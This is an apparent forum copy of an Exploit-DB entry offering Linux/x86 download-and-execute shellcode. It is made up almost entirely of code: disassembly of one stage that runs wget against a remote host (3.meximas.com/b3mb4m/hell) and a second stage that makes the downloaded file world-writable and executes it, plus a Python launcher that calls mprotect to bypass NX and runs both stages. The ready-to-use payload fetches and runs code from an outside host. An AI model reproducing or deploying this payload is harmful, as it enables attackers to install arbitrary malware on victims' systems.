- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37365
- Проверка EDB
-
- Пройдено
- Автор
- B3MB4M
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2015-06-24
Linux/x86 - Download File + Execute Shellcode
C:
Linux/x86 Download&Execute
------WE ARE BOMBERMANS----
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Just the two of us LOL.
Info!
This shellcode has two part.Because when using fork in asm, ocurrs problems in shellcode.
So you can use multiprocessing to do this.
If you dont want problem while running shellcodes.
I did not calculate len bytes.Because its completely depend url length.
TESTED ON : Ubuntu 14.04
/*
The NX Bit prevents random data being executed on modern processors and OSs.
To get around it, call mprotect.
You should also define your shellcode as a binary instead of a character string.
-By Philipp Hagemeister
Emmy goes to Philipp Hagemeister ! ! (clap clap clap clap)
Special thanks :) ..
*/
;https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
;Use it convert string to stack.
#Remote file download#
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 68 65 6c 6c push $0x6c6c6568
8048068: 68 62 34 6d 2f push $0x2f6d3462
804806d: 68 2f 62 33 6d push $0x6d33622f
8048072: 68 6d 2f 2f 2f push $0x2f2f2f6d
8048077: 68 73 2e 63 6f push $0x6f632e73
804807c: 68 78 69 6d 61 push $0x616d6978
8048081: 68 33 2e 6d 65 push $0x656d2e33 ;3.meximas.com/b3mb4m/hell
8048086: 89 e1 mov %esp,%ecx
8048088: 50 push %eax
8048089: 68 77 67 65 74 push $0x74656777
804808e: 68 62 69 6e 2f push $0x2f6e6962
8048093: 68 75 73 72 2f push $0x2f727375
8048098: 68 2f 2f 2f 2f push $0x2f2f2f2f
804809d: 89 e3 mov %esp,%ebx
804809f: 50 push %eax
80480a0: 50 push %eax
80480a1: 51 push %ecx
80480a2: 53 push %ebx
80480a3: 89 e1 mov %esp,%ecx
80480a5: b0 0b mov $0xb,%al
80480a7: cd 80 int $0x80
80480a9: 31 c0 xor %eax,%eax
80480ab: fe c0 inc %al
80480ad: cd 80 int $0x80
#Download&Chmod777&Execute
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 c9 xor %ecx,%ecx
8048064: 50 push %eax
8048065: 68 68 65 6c 6c push $0x6c6c6568 ;file name(hell)
804806a: b0 0f mov $0xf,%al
804806c: 89 e3 mov %esp,%ebx
804806e: 66 b9 ff 01 mov $0x1ff,%cx
8048072: cd 80 int $0x80
8048074: 31 c0 xor %eax,%eax
8048076: 50 push %eax
8048077: 89 e2 mov %esp,%edx
8048079: 53 push %ebx
804807a: 89 e1 mov %esp,%ecx
804807c: b0 0b mov $0xb,%al
804807e: cd 80 int $0x80
Than lets back python.
#!/usr/bin/python
import ctypes
import multiprocessing
import time
def download(firstone="Capture"):
if firstone != "Capture":
#Download codes.
shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\x68\x62\x34\x6d\x2f\x68\x2f\x62"
b"\x33\x6d\x68\x6d\x2f\x2f\x2f\x68\x73\x2e\x63\x6f\x68\x78\x69\x6d\x61\x68\x33\x2e"
b"\x6d\x65\x89\xe1\x50\x68\x77\x67\x65\x74\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f"
b"\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xfe"
b"\xc0\xcd\x80")
else:
time.sleep(30)#Time delay, depend ur file size.
shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\xb0\x0f\x89\xe3\x66\xb9\xff\x01"
b"\xcd\x80\x31\xc0\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
#Chomd777 and execute it.
shellcode = ctypes.c_char_p(shellcode_data)
function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
addr = ctypes.cast(function, ctypes.c_void_p).value
libc = ctypes.CDLL('libc.so.6')
pagesize = libc.getpagesize()
addr_page = (addr // pagesize) * pagesize
for page_start in range(addr_page, addr + len(shellcode_data), pagesize):
assert libc.mprotect(page_start, pagesize, 0x7) == 0
function()
for x in xrange(0, 2):
if x == 0:
first = multiprocessing.Process(target=download, args=("KnockKnock",))
else:
first = multiprocessing.Process(target=download)
first.start()
#Bomberman Team presented !!- Источник
- www.exploit-db.com
